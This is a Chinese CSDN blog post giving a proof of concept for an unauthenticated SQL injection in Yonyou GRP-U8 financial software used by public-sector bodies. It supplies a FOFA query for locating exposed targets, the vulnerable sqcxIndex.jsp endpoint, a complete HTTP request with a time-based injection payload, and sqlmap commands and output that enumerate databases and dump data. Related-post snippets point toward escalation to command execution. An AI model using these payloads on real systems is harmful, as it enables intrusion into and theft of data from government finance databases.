用友GRP:XVE-2024[SQL注入]

已于 2024-08-14 14:41:28 修改
阅读量260 收藏
点赞数 2
文章标签: sql 数据库 2024
于 2024-08-14 14:16:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/141188841
版权

fofa语法:

app="用友-GRP-U8"

漏洞点

/u8qx/sqcxIndex.jsp?key=1

POC

GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:10'-- HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5AB71B604B4836522AE5497D7364DA6A
Connection: close

sql语法:

WAITFOR DELAY '0:0:6' 指定 SQL Server 等待 6 秒钟

  • 第一个数字 0 表示小时。
  • 第二个数字 0 表示分钟。
  • 第三个数字 6 表示秒

使用SqlMap进行测试

sqlmap使用:【SQL注入工具】SQLMap参数详解_sqlmap参数-t-CSDN博客

获取数据库名

sqlmap.py -u host --batch --dbs 
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: key (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: key=1');WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: key=1') UNION ALL SELECT NULL,CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(72)+CHAR(73)+CHAR(122)+CHAR(101)+CHAR(87)+CHAR(76)+CHAR(119)+CHAR(122)+CHAR(71)+CHAR(70)+CHAR(103)+CHAR(76)+CHAR(117)+CHAR(75)+CHAR(119)+CHAR(103)+CHAR(68)+CHAR(85)+CHAR(107)+CHAR(105)+CHAR(90)+CHAR(84)+CHAR(115)+CHAR(117)+CHAR(116)+CHAR(89)+CHAR(113)+CHAR(108)+CHAR(100)+CHAR(117)+CHAR(122)+CHAR(79)+CHAR(72)+CHAR(84)+CHAR(100)+CHAR(97)+CHAR(86)+CHAR(71)+CHAR(81)+CHAR(81)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(107)+CHAR(113)-- prXP
---
available databases [8]:
[*] anyisys
[*] GZMH
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

获取指定数据库数据[测试采用时间盲注,用时较长]

sqlmap.py -u host -D tempdb --batch –time-sec=10 --dump --output-dir=
-time-sec:指定延时
--output-dir= 指定保存路径
--batch 默认yes
-D 指定数据库
-T 指定表
-C 指定列
--dump 获取数据

Zeddm
关注
用友GRP-U8 userInfoWeb SQL注入致RCE漏洞复现 (XVE-2024-10539)
0xSec
05-14 634
用友GRP-U8R10行政事业内控管理软件userInfoWeb接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)
0xSec
05-27 584
用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
2020最全MySQL面试题(附答案)
weixin_47531845的博客
09-29 1482
Mysql中有哪几种锁? 1.表级锁:开销小,加锁快;不会出现死锁;锁定粒度大,发生锁冲突的概率最高,并发度最低。 2.行级锁:开销大,加锁慢;会出现死锁;锁定粒度最小,发生锁冲突的概率最低,并发度也最高。 3. 页面锁:开销和加锁时间界于表锁和行锁之间;会出现死锁;锁定粒度界于表锁和行锁之间,并发度一般。 Mysql中有哪些不同的表格? 共有5种类型的表格: MyISAM Heap Merge INNODB ISAM 简述在MySQL数据库中MyISAM和InnoDB的区别 ...
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞
今天是几号的博客
10-03 1700
在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png。用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。POC:拼接/u8qx/slbmbygr.jsp?使用SQLmap进行注入利用。
用友grp-u8SQL注入&命令执行
MD@@nr丫卡uer
11-20 5640
用友grp-u8SQL注入&命令执行 fofa搜索语句 title=“GRP-U8” 1、查询版本信息:select @@version 2、验证是否为sa权限:select IS_SRVROLEMEMBER(‘sysadmin’) //返回 1,说明是sa权限,可执行sql语句。 3、判断目标机的MSSQL服务是否存在xp_cmdshell扩展存储过程: select count(*) from master.dbo.sysobjects where xtype=‘x’ and name=‘xp_
用友GRP-U8 bx_dj_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10537)
0xSec
05-14 362
用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager,产品分B、C、G三个产品系列,以上受到本次通报漏洞的影响。
用友GRP-U8 sqcxIndex.jsp SQL注入漏洞(XVE-2024-12560)
wan___she__pi的博客
05-28 305
用友GRP-U8是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是行政事业财务领域最专业的政府财务管理软件。
用友GRP-U8 dialog_moreUser_check.jsp SQL注入致RCE漏洞复现(XVE-2024-10610)
0xSec
05-14 443
用友GRP-U8R10行政事业内控管理软件dialog_moreUser_check.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友 GRP-U8 fastjson远程代码执行漏洞复现(XVE-2024-8863)
0xSec
04-24 855
用友 GRP-U8 R10系列版本 VerifyToken 接口存在低版本fastjson反序列化漏洞,未经身份验证的攻击者可利用此漏洞获取服务器权限。
union all SQL 操作符
2301_77836489的博客
10-15 424
union all SQL 操作符
SQL调优指南及高级SQL技巧
Hellc007的博客
10-14 1028
SQL调优是一个复杂的任务,需要对数据库结构、索引设计、查询逻辑、事务管理等多个方面的深入理解。通过运用上述高级技巧和应对实战问题的策略,可以有效提高SQL查询的性能,优化数据库的整体表现。希望这篇文章能为你的添彩。
Flink PostgreSQL CDC源码解读:深入理解数据流同步
击水三千里的专栏
10-18 88
PostgreSQL通过Replication Slot和Logical Decoding实现CDC,捕获数据变更并通过Debezium等工具发送到消息队列。WAL日志记录数据库操作,而Debezium支持多种部署方式,如Kafka Connect和嵌入式引擎,以实现数据流同步。Flink通过配置postgres-cdc连接器,利用Debezium获取PostgreSQL的变更数据。
[SQL] 数据库增删改操作
qq_45280097的博客
10-11 314
【代码】[SQL] 数据库增删改操作。
SQL】深入探索SQL调优:提升数据库性能的全面指南
人生苦短,睡觉要紧,睡醒再说
10-09 1881
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的关键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接关系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
SQL Injection | MySQL 手工注入全流程
Blue17 の 小窝
10-16 1564
在本阶段中,我们需要判断注入点的数据类型(数字型、字符型、搜索型、XX 型)与后端查询方式,并使用对应的 SQL 语句进行测试,判断出目标是否存在注入点。当目标会将数据库内容回显(使用报错注入可以无视这步)时,我们还需要猜测目标返回的数据库中的字段数量,以方便我们后续的注入。知道了目标返回的字段数量后,我们需要判断这些字段中哪些内容是可以直接显示在页面上的(有回显点),以方便我们后续获取数据库中的内容。在本阶段中,我们会利用第三阶段的回显点,使用各种 SQL 语句与函数,获取目标数据库的信息。
PostgreSQL与MySQL在语法上的区别
zhaoshanshan168的博客
10-15 177
在PostgreSQL中,存储过程是通过定义存储过程函数来创建的,而在MySQL中,存储过程是通过在脚本文件(.sql)中定义来创建的。在PostgreSQL中,表和索引是通过定义表名和索引名来创建的,而在MySQL中,表和索引是通过在表前面加上表名和索引名来创建的。例如,在PostgreSQL中,我们可以使用CREATE TABLE语句来创建表,而在MySQL中,我们可以使用CREATE TABLE语句和CREATE INDEX语句来创建表和索引。PostgreSQL和MySQL中的运算符也有一些区别。
【力扣 | SQL题 | 每日4题】力扣1596,1587,2228,2066
最新发布
2301_80912559的博客
10-18 381
表中的每行数据表示一次交易的信息, 包括此次交易的账号(account_id), 交易类型(type), 交易发生时间(day), 交易发生金额(amount).Bob (customer 2) 一次订购键盘, 一次订购鼠标, 一次订购显示器, 所以这些都是 Bob 最经常订购的商品.- 2021-11-09 --> 取出1000. 余额变为 2000 - 1000 = 1000.- 2021-12-12 --> 取出 7000. 余额变为 7000 - 7000 = 0.
sql server 行转列及列转行
weixin_42698221的博客
10-18 156
图1图2。
用友GRP-U8行政事业财务管理软件G版安装与操作指南
用友GRP-U8行政事业单位财务管理软件G版操作手册》是一份详细介绍了如何使用这款针对新会计制度设计的专业财务管理软件的文档。该手册由四川弘智远大科技有限公司发布于2016年6月,旨在帮助用户高效地进行账务处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值